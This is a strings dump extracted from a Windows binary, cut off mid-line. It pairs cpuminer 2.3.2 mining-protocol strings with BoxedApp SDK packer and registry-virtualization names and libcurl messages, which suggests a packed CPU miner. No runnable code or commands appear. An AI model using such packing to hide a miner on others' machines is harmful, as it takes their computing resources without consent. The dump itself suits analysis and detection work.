failed(%d): %s</pre><pre>{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}</pre><pre>{"method": "getwork", "params": [ "%s" ], "id":1}</pre><pre>JSON key '%s' not found</pre><pre>JSON key '%s' is not a string</pre><pre>CURL initialization failed</pre><pre>%s%s%s</pre><pre>Long-polling activated for %s</pre><pre>json_rpc_call failed, retry after %d seconds</pre><pre>DEBUG: got new work in %d ms</pre><pre>Binding thread %d to cpu %d</pre><pre>thread %d: %lu hashes, %s khash/s</pre><pre>Total: %s khash/s</pre><pre>work retrieval failed, exiting mining thread %d</pre><pre>http://127.0.0.1:9332/</pre><pre>%s: unsupported non-option argument '%s'</pre><pre>JSON option %s invalid</pre><pre>https:</pre><pre>%s:%s</pre><pre>thread %d create failed</pre><pre>%d miner threads started, using '%s' algorithm.</pre><pre>cert</pre><pre>userpass</pre><pre>-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)</pre><pre>-O, --userpass=U:P username:password pair for mining server</pre><pre>-p, --pass=PASSWORD password for mining server</pre><pre>--cert=FILE certificate for mining server using SSL</pre><pre>-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy</pre><pre>--no-longpoll disable X-Long-Polling support</pre><pre>--no-stratum disable X-Stratum support</pre><pre>[%d-d-d d:d:d] %s</pre><pre>User-Agent: cpuminer/2.3.2</pre><pre>HTTP request failed: %s</pre><pre>JSON-RPC call failed: %s</pre><pre>hex2bin failed on '%s'</pre><pre>DEBUG: %s</pre><pre>Hash: %s</pre><pre>Target: %s</pre><pre>http%s</pre><pre>http_proxy</pre><pre>Stratum connection failed: %s</pre><pre>{"id": 1, "method": "mining.subscribe", "params": []}</pre><pre>{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}</pre><pre>{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}</pre><pre>mining.notify</pre><pre>Stratum session id: %s</pre><pre>mining.set_difficulty</pre><pre>client.reconnect</pre><pre>stratum tcp://%s:%d</pre><pre>Server requested reconnection to %s</pre><pre>client.get_version</pre><pre>cpuminer/2.3.2</pre><pre>client.show_message</pre><pre>MESSAGE FROM SERVER: %s</pre><pre>{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}</pre><pre>%s near '%s'</pre><pre>%s near end of file</pre><pre>unable to decode byte 0x%x at position %d</pre><pre>control character 0x%x</pre><pre>invalid Unicode '\uX\uX'</pre><pre>invalid Unicode '\uX'</pre><pre>end == saved_text lex->saved_text.length</pre><pre>unable to open %s: %s</pre><pre>\ux</pre><pre>\ux\ux</pre><pre>mingwm10.dll</pre><pre>__mingwthr_remove_key_dtor</pre><pre>__mingwthr_key_dtor</pre><pre>VirtualQuery failed for %d bytes at address %p</pre><pre>Unknown pseudo relocation protocol version %d.</pre><pre>Unknown pseudo relocation bit size %d.</pre><pre>%s: option requires an argument -- %c</pre><pre>%s: unrecognised option `-%s'</pre><pre>%s: invalid option -- %c</pre><pre>option `%s%s' doesn't accept an argument</pre><pre>option `%s%s' requires an argument</pre><pre>%s: option `%s' is ambiguous</pre><pre>%s: unrecognised option `%s'</pre><pre>0123456789</pre><pre>1399780752 312</pre><pre>curl_easy_cleanup</pre><pre>curl_easy_init</pre><pre>curl_easy_perform</pre><pre>curl_easy_reset</pre><pre>curl_easy_setopt</pre><pre>curl_global_init</pre><pre>curl_slist_append</pre><pre>curl_slist_free_all</pre><pre>curl_version</pre><pre>pthread_join</pre><pre>libcurl-4.dll</pre><pre>KERNEL32.dll</pre><pre>msvcrt.dll</pre><pre>pthreadGC2.dll</pre><pre>WS2_32.dll</pre><pre>zcÁ</pre><pre>KERNEL32.DLL</pre><pre>USER32.DLL</pre><pre>EnumChildWindows</pre><pre>kernel32.dll</pre><pre>ntdll.dll</pre><pre>mscoree.dll</pre><pre>.mixcrt</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>operator</pre><pre>USER32.dll</pre><pre>SHELL32.dll</pre><pre>OLEAUT32.dll</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>EXEPackerHost32.exe</pre><pre>?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>.\BoxedAppSDK_StaticLib.cpp</pre><pre>BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper</pre><pre>BoxedAppSDK_AttachMixedBitnessProcessHelper</pre><pre>BoxedAppSDK_EnumVirtualRegKeysA</pre><pre>BoxedAppSDK_EnumVirtualRegKeysW</pre><pre>BoxedAppSDK_ExecuteDotNetApplicationA</pre><pre>BoxedAppSDK_ExecuteDotNetApplicationW</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyByHandle</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyW</pre><pre>BoxedAppSDK_DeleteVirtualRegKeyA</pre><pre>BoxedAppSDK_CreateVirtualRegKeyW</pre><pre>BoxedAppSDK_CreateVirtualRegKeyA</pre><pre>C62E2B35-E4B3-4019-A7C4-F50AC7F78470</pre><pre>Get exe dir...</pre><pre>Get exe dir...done</pre><pre>Get the extension...done</pre><pre>Get current dir...done</pre><pre>Get old args...done</pre><pre>The command line overriding: %s</pre><pre>GetCommandLineW preparing to intercept...done</pre><pre>GetCommandLineA preparing to intercept...done</pre><pre>The embedding BoxedApp into child processes: %s</pre><pre>GetWindowsDirectoryW</pre><pre>RegCreateKeyExW</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>EXEPackerStub32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb</pre><pre>l$D9.tO</pre><pre>FTPSW</pre><pre>uÂ$D</pre><pre><p></p><pre>TryCreateProcessForVirtualEXE, template exe found:</pre><pre>CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtQueryKey, KeyHandle =</pre><pre>CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =</pre><pre>CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x</pre><pre>KernelBase.dll</pre><pre>0x%x%x</pre><pre>CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '</pre><pre>CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '</pre><pre>CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtRenameKey, KeyHandle =</pre><pre>BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart</pre><pre>: Can't create process of rundll32.exe, last error =</pre><pre>{4F95F74C-9713-4181-ACDD-8A50195FBC0F}</pre><pre>BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper</pre><pre>BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper</pre><pre>CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '</pre><pre>CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x</pre><pre>CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x</pre><pre>:\VirtualDllWithSameImport.dll</pre><pre>:\VirtualDllWithTls.dll</pre><pre>VirtualDllWithTls.dll</pre><pre>VirtualDllWithSameImport.dll</pre><pre>WinExec</pre><pre>advapi32.dll</pre><pre>NtRenameKey</pre><pre>NtUnloadKey</pre><pre>NtSetValueKey</pre><pre>NtSetInformationKey</pre><pre>NtSaveKey</pre><pre>NtRestoreKey</pre><pre>NtReplaceKey</pre><pre>NtQueryValueKey</pre><pre>NtQueryMultipleValueKey</pre><pre>NtQueryKey</pre><pre>NtOpenKeyEx</pre><pre>NtOpenKey</pre><pre>NtNotifyChangeKey</pre><pre>NtLoadKey2</pre><pre>NtLoadKey</pre><pre>NtFlushKey</pre><pre>NtEnumerateValueKey</pre><pre>NtEnumerateKey</pre><pre>NtDeleteValueKey</pre><pre>NtDeleteKey</pre><pre>NtCreateKey</pre><pre>[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]</pre><pre>FILE_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>KEY_WOW64_64KEY</pre><pre>KEY_WOW64_32KEY</pre><pre>KEY_NOTIFY</pre><pre>KEY_CREATE_LINK</pre><pre>KEY_ENUMERATE_SUB_KEYS</pre><pre>KEY_CREATE_SUB_KEY</pre><pre>KEY_SET_VALUE</pre><pre>KEY_QUERY_VALUE</pre><pre>SECTION_MAP_EXECUTE</pre><pre>PAGE_EXECUTE_WRITECOPY</pre><pre>PAGE_EXECUTE_READWRITE</pre><pre>PAGE_EXECUTE_READ</pre><pre>PAGE_EXECUTE</pre><pre>STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED</pre><pre>STATUS_LOCAL_USER_SESSION_KEY</pre><pre>STATUS_NULL_LM_PASSWORD</pre><pre>STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE</pre><pre>STATUS_CARDBUS_NOT_SUPPORTED</pre><pre>STATUS_INVALID_PORT_ATTRIBUTES</pre><pre>STATUS_PORT_MESSAGE_TOO_LONG</pre><pre>STATUS_PORT_DISCONNECTED</pre><pre>STATUS_PORT_CONNECTION_REFUSED</pre><pre>STATUS_INVALID_PORT_HANDLE</pre><pre>STATUS_PORT_ALREADY_SET</pre><pre>STATUS_EAS_NOT_SUPPORTED</pre><pre>STATUS_CTL_FILE_NOT_SUPPORTED</pre><pre>STATUS_WRONG_PASSWORD</pre><pre>STATUS_ILL_FORMED_PASSWORD</pre><pre>STATUS_PASSWORD_RESTRICTION</pre><pre>STATUS_PASSWORD_EXPIRED</pre><pre>STATUS_FLOAT_DENORMAL_OPERAND</pre><pre>STATUS_FLOAT_INVALID_OPERATION</pre><pre>STATUS_PIPE_NOT_AVAILABLE</pre><pre>STATUS_INVALID_PIPE_STATE</pre><pre>STATUS_PIPE_BUSY</pre><pre>STATUS_PIPE_DISCONNECTED</pre><pre>STATUS_PIPE_CLOSING</pre><pre>STATUS_PIPE_CONNECTED</pre><pre>STATUS_PIPE_LISTENING</pre><pre>STATUS_NOT_SUPPORTED</pre><pre>STATUS_PIPE_EMPTY</pre><pre>STATUS_WRONG_PASSWORD_CORE</pre><pre>STATUS_PIPE_BROKEN</pre><pre>STATUS_DISK_OPERATION_FAILED</pre><pre>STATUS_KEY_DELETED</pre><pre>STATUS_KEY_HAS_CHILDREN</pre><pre>STATUS_NO_USER_SESSION_KEY</pre><pre>STATUS_PASSWORD_MUST_CHANGE</pre><pre>STATUS_PORT_UNREACHABLE</pre><pre>STATUS_LOGIN_TIME_RESTRICTION</pre><pre>STATUS_LOGIN_WKSTA_RESTRICTION</pre><pre>STATUS_UNSUPPORTED_COMPRESSION</pre><pre>STATUS_NO_USER_KEYS</pre><pre>STATUS_NOT_EXPORT_FORMAT</pre><pre>STATUS_TRANSPORT_FULL</pre><pre>STATUS_WMI_NOT_SUPPORTED</pre><pre>STATUS_SAM_NEED_BOOTKEY_PASSWORD</pre><pre>STATUS_SAM_NEED_BOOTKEY_FLOPPY</pre><pre>STATUS_STRONG_CRYPTO_NOT_SUPPORTED</pre><pre>STATUS_NOT_SUPPORTED_ON_SBS</pre><pre>STATUS_CSS_KEY_NOT_PRESENT</pre><pre>STATUS_CSS_KEY_NOT_ESTABLISHED</pre><pre>STATUS_NO_KERB_KEY</pre><pre>STATUS_UNSUPPORTED_PREAUTH</pre><pre>STATUS_PORT_NOT_SET</pre><pre>STATUS_INVALID_IMPORT_OF_NON_DLL</pre><pre>STATUS_SMARTCARD_NO_KEY_CONTAINER</pre><pre>STATUS_SMARTCARD_NO_CERTIFICATE</pre><pre>STATUS_SMARTCARD_NO_KEYSET</pre><pre>STATUS_SMARTCARD_CERT_REVOKED</pre><pre>STATUS_SMARTCARD_CERT_EXPIRED</pre><pre>STATUS_SXS_KEY_NOT_FOUND</pre><pre>STATUS_CLUSTER_JOIN_IN_PROGRESS</pre><pre>STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS</pre><pre>RegDeleteKeyExW</pre><pre>NtRequestWaitReplyPort</pre><pre>NtConnectPort</pre><pre>NtReplyPort</pre><pre>NtCompleteConnectPort</pre><pre>NtAcceptConnectPort</pre><pre>NtReplyWaitReceivePort</pre><pre>NtCreateWaitablePort</pre><pre>Imported function,</pre><pre>.data</pre><pre>It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL</pre><pre>It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream</pre><pre>It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys</pre><pre>NtEnumerateKey() returned unexpected error, status =</pre><pre>, RegTree::IEnumKeyNode::GetNext() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys</pre><pre>, RegTree::IKeyNode::EnumKeys() failed, hr =</pre><pre>: RegTree::IEnumKeyNode::GetNext() failed, hr =</pre><pre>: GetAllChildsKeys() failed, status =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal</pre><pre>: RegTree::IKeyNode::EnumKeys() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath</pre><pre>error, IVirtualKeyHandle_GetFullPath() returned</pre><pre>Invalid key information class:</pre><pre>KeySetHandleTagsInformation is not supported for virtual handle</pre><pre>KeySetDebugInformation is not supported for virtual handle</pre><pre>KeySetVirtualizationInformation is not supported for virtual handle</pre><pre>KeyControlFlagsInformation is not supported for virtual handle</pre><pre>KeyWow64FlagsInformation is not supported for virtual handle</pre><pre>We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles</pre><pre>We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles</pre><pre>: IVirtualKeyHandle::Rename() failed, hr =</pre><pre>: RegTree::IKeyNode::Remove() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal</pre><pre>: RegTree::IKeyNode::AddKey() failed, hr =</pre><pre>: result hkey =</pre><pre>: IVirtualKey::CreateKey() failed, hr =</pre><pre>: we can't create a virtual key with its own behavior under another virtual key</pre><pre>: Handles::CreateVirtualKeyHandle() failed, hr =</pre><pre>: IVirtualKey::OpenKey() failed, hr =</pre><pre>: RegImpl::CreateKeyOnSharedMem() failed, hr =</pre><pre>: GetFullRegKeyPath() failed for the hKey =</pre><pre>: Handles::IVirtualKeyHandle::CreateKey() failed and returned</pre><pre>: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey</pre><pre>: lpSubKey: "</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey</pre><pre>: Handles::CreateVirtualKeyHandle() failed</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal</pre><pre>: SearchStartingFromRealKey() failed</pre><pre>: RegTree::IKeyNode::FindValue() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal</pre><pre>: IVirtualKeyHandle::put_Value() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime</pre><pre>: NtQueryKey() failed, status =</pre><pre>: NtOpenKey() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys</pre><pre>: NtEnumerateValueKey() failed when we tried to get name of the node, status =</pre><pre>: IKeyNode::EnumValues() failed, hr =</pre><pre>: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =</pre><pre>: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal</pre><pre>: invalid KeyInformationClass passed:</pre><pre>: IVirtualKeyHandle_GetFullPath() failed, hr =</pre><pre>: Behavior::IEnumVirtualKey::GetNext() failed, hr =</pre><pre>: IVirtualKeyHandle::EnumValues() failed, hr =</pre><pre>: IVirtualKeyHandle::EnumKeys() failed, hr =</pre><pre>: IVirtualKeyHandle::get_LastWriteTime() failed, hr =</pre><pre>reg:NtQueryMultipleValueKey(</pre><pre>: IKeyNode::FindValue() failed, hr =</pre><pre>: IVirtualKeyHandle::get_Value() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal</pre><pre>: IVirtualKeyHandle::get_ValueType() failed, hr =</pre><pre>reg:NtSetInformationKey(</pre><pre>RegTree::IKeyNode::RemoveValue() failed, hr</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal</pre><pre>reg:NtRenameKey(</pre><pre>RegTree::IEnumKeyNode::GetNext(), hr =</pre><pre>RegTree::IKeyNode::EnumKeys(), hr =</pre><pre>: IEnumVirtualKey::GetNext() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal</pre><pre>reg:NtDeleteValueKey(</pre><pre>: NtEnumerateKey() failed when we tried to get name of the node, status =</pre><pre>, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =</pre><pre>, Behavior::IVirtualKey::OpenKey() failed, hr =</pre><pre>: IKeyNode::EnumKeys() failed, hr =</pre><pre>BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal</pre><pre>reg:NtEnumerateValueKey(</pre><pre>reg:NtQueryKey(</pre><pre>reg:NtQueryValueKey(</pre><pre>reg:NtSetValueKey(</pre><pre>reg:NtCreateKey(</pre><pre>reg:NtDeleteKey(</pre><pre>reg:NtEnumerateKey(</pre><pre>reg:NtOpenKey(</pre><pre>RegOpenKeyExW</pre><pre>RegOpenKeyW</pre><pre>bxsdk32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb</pre><pre>`.rsrc</pre><pre>v2.0.50727</pre><pre>BoxedAppSDK_AppDomainManager.dll</pre><pre>System.Security</pre><pre>.ctor</pre><pre>System.Security.Policy</pre><pre>System.Reflection</pre><pre>System.Runtime.InteropServices</pre><pre>System.Diagnostics</pre><pre>System.Runtime.CompilerServices</pre><pre>System.Collections</pre><pre>System.Security.Permissions</pre><pre>System.IO</pre><pre>DllImportAttribute</pre><pre>shell32.dll</pre><pre>lpCmdLine</pre><pre>1.0.0.0</pre><pre>$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78</pre><pre>D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb</pre><pre>BoxedAppSDKThunk32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb</pre><pre>.reloc</pre><pre>TLSSupport32.dll</pre><pre>d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb</pre><pre>9 9$9(9,909</pre><pre>4!40484}4</pre><pre>:$:,:5:::{:</pre><pre>?#?2?9?@?</pre><pre>1 1$1(1,1014181</pre><pre>9$=(=,=0=4=8=<=@=</pre><pre>6 6$6(6,6064686<6@6</pre><pre>1"26233'4</pre><pre>4 40454:4</pre><pre>:":2:7:>;</pre><pre>,1014181</pre><pre>8 8$8(8,8</pre><pre>P`.data</pre><pre>.edata</pre><pre>0@.idata</pre><pre>SShPi</pre><pre>SSh}i</pre><pre>purl/</pre><pre>j.RPj</pre><pre>libgcj_s.dll</pre><pre>Couldn't open file %s</pre><pre>Can't open %s for writing</pre><pre>Can't get the size of %s</pre><pre>Last-Modified: %s, d %s M d:d:d GMT</pre><pre>%c%c==</pre><pre>%c%c%c=</pre><pre>%c%c%c%c</pre><pre>%s:%d</pre><pre>%5[^:]:%d:%5s</pre><pre>Resolve %s found illegal!</pre><pre>Added %s:%d:%s to DNS cache</pre><pre>timeout on name lookup is not supported</pre><pre>%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s</pre><pre>; filename="%s"</pre><pre>%s; boundary=%s</pre><pre>Content-Type: multipart/mixed, boundary=%s</pre><pre>Content-Type: %s</pre><pre>couldn't open file "%s"</pre><pre>--%s--</pre><pre>p.jpg</pre><pre>p.jpeg</pre><pre>p.txt</pre><pre>p.html</pre><pre>p.xml</pre><pre>#HttpOnly_</pre><pre>23[^;</pre><pre>=]=I99[^;</pre><pre>httponly</pre><pre>skipped cookie with illegal dotcount domain: %s</pre><pre>skipped cookie with bad tailmatch domain: %s</pre><pre>%s cookie %s="%s" for domain %s, path %s, expire %lld</pre><pre># Netscape HTTP Cookie File</pre><pre># http://curl.haxx.se/docs/http-cookies.html</pre><pre># This file was generated by libcurl! Edit at your own risk.</pre><pre># Fatal libcurl error</pre><pre>WARNING: failed to save cookies in %s</pre><pre>Avoided giant realloc for header (max is %d)!</pre><pre>HTTP/</pre><pre>The requested URL returned error: %d</pre><pre>%s, d %s M d:d:d GMT</pre><pre>If-Modified-Since: %s</pre><pre>If-Unmodified-Since: %s</pre><pre>Last-Modified: %s</pre><pre>%sAuthorization: Basic %s</pre><pre>%s auth using %s with user '%s'</pre><pre>Referer: %s</pre><pre>Accept-Encoding: %s</pre><pre>%s, TE</pre><pre>Chunky upload is not supported by HTTP 1.0</pre><pre>Host: %s%s%s</pre><pre>Host: %s%s%s:%hu</pre><pre>ftp://</pre><pre>;type=%c</pre><pre>Range: bytes=%s</pre><pre>Content-Range: bytes %s%lld/%lld</pre><pre>Content-Range: bytes %s/%lld</pre><pre>ftp://%s:%s@%s</pre><pre>%s HTTP/%s</pre><pre>%s%s%s%s%s%s%s%s%s%s%s</pre><pre>%s%s=%s</pre><pre>Internal HTTP POST error!</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>Failed sending HTTP POST request</pre><pre>Failed sending HTTP request</pre><pre>HTTP error before end of send, stop sending</pre><pre>HTTP/%d.%d =</pre><pre>HTTP =</pre><pre>RTSP/%d.%d =</pre><pre>The requested URL returned error: %s</pre><pre>HTTP 1.0, assume close after body</pre><pre>HTTP/1.0 proxy connection set to keep alive!</pre><pre>HTTP/1.1 proxy connection set close!</pre><pre>HTTP/1.0 connection set to keep alive!</pre><pre>[%s %s %s]</pre><pre>Recv failure: %s</pre><pre>Send failure: %s</pre><pre>/etc/ssl/certs/ca-certificates.crt</pre><pre>IDN support not present, can't parse Unicode domains</pre><pre>Connected to %s (%s) port %ld (#%ld)</pre><pre>%5[^:@]:%5[^@]</pre><pre>[%*45[0123456789abcdefABCDEF:.]%c</pre><pre>%s://%s%s%s:%hu%s%s%s</pre><pre>Port number too large: %lu</pre><pre>Couldn't resolve host '%s'</pre><pre>Couldn't resolve proxy '%s'</pre><pre>User-Agent: %s</pre><pre>About to connect() to %s%s port %ld (#%ld)</pre><pre>Curl_addHandleToPipeline: length: %d</pre><pre>Closing connection %d</pre><pre>Connection #%ld to host %s left intact</pre><pre>Found bundle for host %s: %p</pre><pre>Server doesn't support pipelining</pre><pre>Connection %d seems to be dead!</pre><pre>[^:]:%[^</pre><pre>:]://%[^</pre><pre><url> malformed</url></pre><pre>:%5[^@]</pre><pre>Protocol %s not supported or disabled in libcurl</pre><pre>%s://%s</pre><pre>Couldn't find host %s in the _netrc file; using defaults</pre><pre>ftp@example.com</pre><pre>Found connection %d, with requests in the pipe (%d)</pre><pre>Re-using existing connection! (#%ld) with host %s</pre><pre>CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!</pre><pre>Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds</pre><pre>zlib/%s</pre><pre>7.30.0</pre><pre>%%X</pre><pre>login</pre><pre>password</pre><pre>[^?&/:]://%c</pre><pre>Issue another request to this URL: '%s'</pre><pre>Violate RFC 2616/10.3.2 and switch from POST to GET</pre><pre>Violate RFC 2616/10.3.3 and switch from POST to GET</pre><pre>Disables POST, goes with %s</pre><pre>No URL set!</pre><pre>seek callback returned error %d</pre><pre>the ioctl callback returned %d</pre><pre>ioctl callback returned error %d</pre><pre>operation aborted by callback</pre><pre>Rewinding stream by : %zd bytes on url %s (zero-length body)</pre><pre>Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)</pre><pre>HTTP server doesn't seem to support byte ranges. Cannot resume.</pre><pre>Problem (%d) in the Chunked-Encoded data</pre><pre>Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)</pre><pre>Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld</pre><pre>Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.</pre><pre>Operation timed out after %ld milliseconds with %lld out of %lld bytes received</pre><pre>Operation timed out after %ld milliseconds with %lld bytes received</pre><pre>pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.</pre><pre>psa_addr inet_ntop() failed with errno %d: %s</pre><pre>Trying %s...</pre><pre>Could not set TCP_NODELAY: %s</pre><pre>TCP_NODELAY set</pre><pre>Failed to set SO_KEEPALIVE on fd %d</pre><pre>Failed to set SIO_KEEPALIVE_VALS on fd %d: %d</pre><pre>Couldn't bind to interface '%s'</pre><pre>Local Interface %s is ip %s using address family %i</pre><pre>Name '%s' family %i resolved to '%s' family %i</pre><pre>Couldn't bind to '%s'</pre><pre>getsockname() failed with errno %d: %s</pre><pre>Local port: %hu</pre><pre>Bind to local port %hu failed, trying next</pre><pre>bind failed with errno %d: %s</pre><pre>Failed to connect to %s: %s</pre><pre>couldn't connect to %s at %s:%d</pre><pre>getpeername() failed with errno %d: %s</pre><pre>ssrem inet_ntop() failed with errno %d: %s</pre><pre>ssloc inet_ntop() failed with errno %d: %s</pre><pre>Failed connect to %s:%ld; %s</pre><pre>pInternal error clearing splay node = %d</pre><pre>Internal error removing splay node = %d</pre><pre>pPipe broke: handle 0x%p, url = %s</pre><pre>In state %d with no easy_conn, bail out!</pre><pre>Error while processing content unencoding: %s</pre><pre>1.2.8</pre><pre>1.2.0.4</pre><pre>px</pre><pre>%s:%s:%s</pre><pre>%s:%.*s</pre><pre>%s:%s:x:%s:%s:%s</pre><pre>%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"</pre><pre>%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"</pre><pre>%s, opaque="%s"</pre><pre>%s, algorithm="%s"</pre><pre>Unsupported protocol</pre><pre>URL using bad/illegal format or missing URL</pre><pre>A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.</pre><pre>FTP: weird server reply</pre><pre>FTP: The server failed to connect to data port</pre><pre>FTP: Accepting server connect has timed out</pre><pre>FTP: The server did not accept the PRET command.</pre><pre>FTP: unknown PASS reply</pre><pre>FTP: unknown PASV reply</pre><pre>FTP: unknown 227 response format</pre><pre>FTP: can't figure out the host in the PASV response</pre><pre>FTP: couldn't set file type</pre><pre>FTP: couldn't retrieve (RETR failed) the specified file</pre><pre>HTTP response code said error</pre><pre>FTP: command PORT failed</pre><pre>FTP: command REST failed</pre><pre>Operation was aborted by an application callback</pre><pre>A libcurl function was given a bad argument</pre><pre>An unknown option was passed in to libcurl</pre><pre>SSL peer certificate or SSH remote key was not OK</pre><pre>Problem with the local SSL certificate</pre><pre>Peer certificate cannot be authenticated with given CA certificates</pre><pre>Problem with the SSL CA cert (path? access rights?)</pre><pre>Unrecognized or bad HTTP Content or Transfer-Encoding</pre><pre>Invalid LDAP URL</pre><pre>Issuer check against peer certificate failed</pre><pre>Login denied</pre><pre>TFTP: File Not Found</pre><pre>TFTP: Access Violation</pre><pre>TFTP: Illegal operation</pre><pre>TFTP: Unknown transfer ID</pre><pre>TFTP: No such user</pre><pre>Caller must register CURLOPT_CONV_ callback options</pre><pre>Error in the SSH layer</pre><pre>Unable to parse FTP file list</pre><pre>Please call curl_multi_perform() soon</pre><pre>CURLSHcode unknown</pre><pre>Protocol option is unsupported</pre><pre>Protocol is unsupported</pre><pre>Socket is unsupported</pre><pre>Operation not supported</pre><pre>Address family not supported</pre><pre>Protocol family not supported</pre><pre>Winsock version not supported</pre><pre>Unknown error %d (%#x)</pre><pre>Curl_ipv4_resolve_r failed for %s</pre><pre>%d.%d.%d.%d</pre><pre>d:d:d</pre><pre>d:d</pre><pre>User was rejected by the SOCKS5 server (%d %d).</pre><pre>SOCKS5 GSSAPI per-message authentication is not supported.</pre><pre>No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)</pre><pre>Failed to resolve "%s" for SOCKS5 connect.</pre><pre>Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)</pre><pre>Can't complete SOCKS5 connection to %s:%d. (%d)</pre><pre>Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)</pre><pre>Failed to 